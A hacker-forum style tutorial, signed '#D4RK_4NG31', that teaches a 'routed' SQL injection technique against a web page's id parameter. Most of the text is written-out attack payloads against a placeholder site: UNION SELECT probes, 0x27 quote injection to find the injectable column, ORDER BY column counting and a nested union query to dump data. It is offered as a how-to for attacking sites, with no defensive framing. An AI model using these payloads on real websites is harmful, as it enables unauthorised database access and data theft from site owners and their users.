Routed SQLi Method

Hey Guys ! Hope You all are fine today :p

Now I'm going to teach you SQLi Routed Query method.

So, Let's start.

First we've to find vuln columns of target website .

web.com/index.php?id=1' union select 1,2,3,4,5--+

Sadly No Vuln Columns is appearing :\

Let's check in source

view-source:http://web.com/index.php?id=1' union select 1,2,3,4,5--+

:( Again no vuln columns is appearing. :) So, it's time to use Routed Query method to dump vuln column.

Let's find vuln column in which we can use routed SQLi method.

To find vuln columns. We'll use 0x27 = '

web.com/index.php?id=1' union select 1,2,3,4,0x27--+ > No error
web.com/index.php?id=1' union select 1,2,3,0x27,5--+ > No error
web.com/index.php?id=1' union select 1,2,0x27,4,5--+ > No error
web.com/index.php?id=1' union select 1,0x27,3,4,5--+ > Error
web.com/index.php?id=1' union select 0x27,2,3,4,5--+ > No Error

Horray ! :D .. We've fine the Vuln columns and it is 2.
Now , we've to use Routed SQLi Query

In this query we've to first put and false before union select & "1" in vuln column where " is for query and 1 is the injection point
Hope You know that Query without injection point never works. So, Let's begin

Time to find Columns

web.com/index.php?id=1' and false union select 1,"1 order by 1",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 2",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 5",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 6",3,4,5--+ > Error

So, Columns are 6 :D

Let's dump vuln columns

web.com/index.php?id=1' and false union select 1,"1 union select 1,2,3,4,5,6",3,4,5--+

:D yeaahhhhhhhh... Vuln columns is appearing.

Hope You like my tutorial ;)
#D4RK_4NG31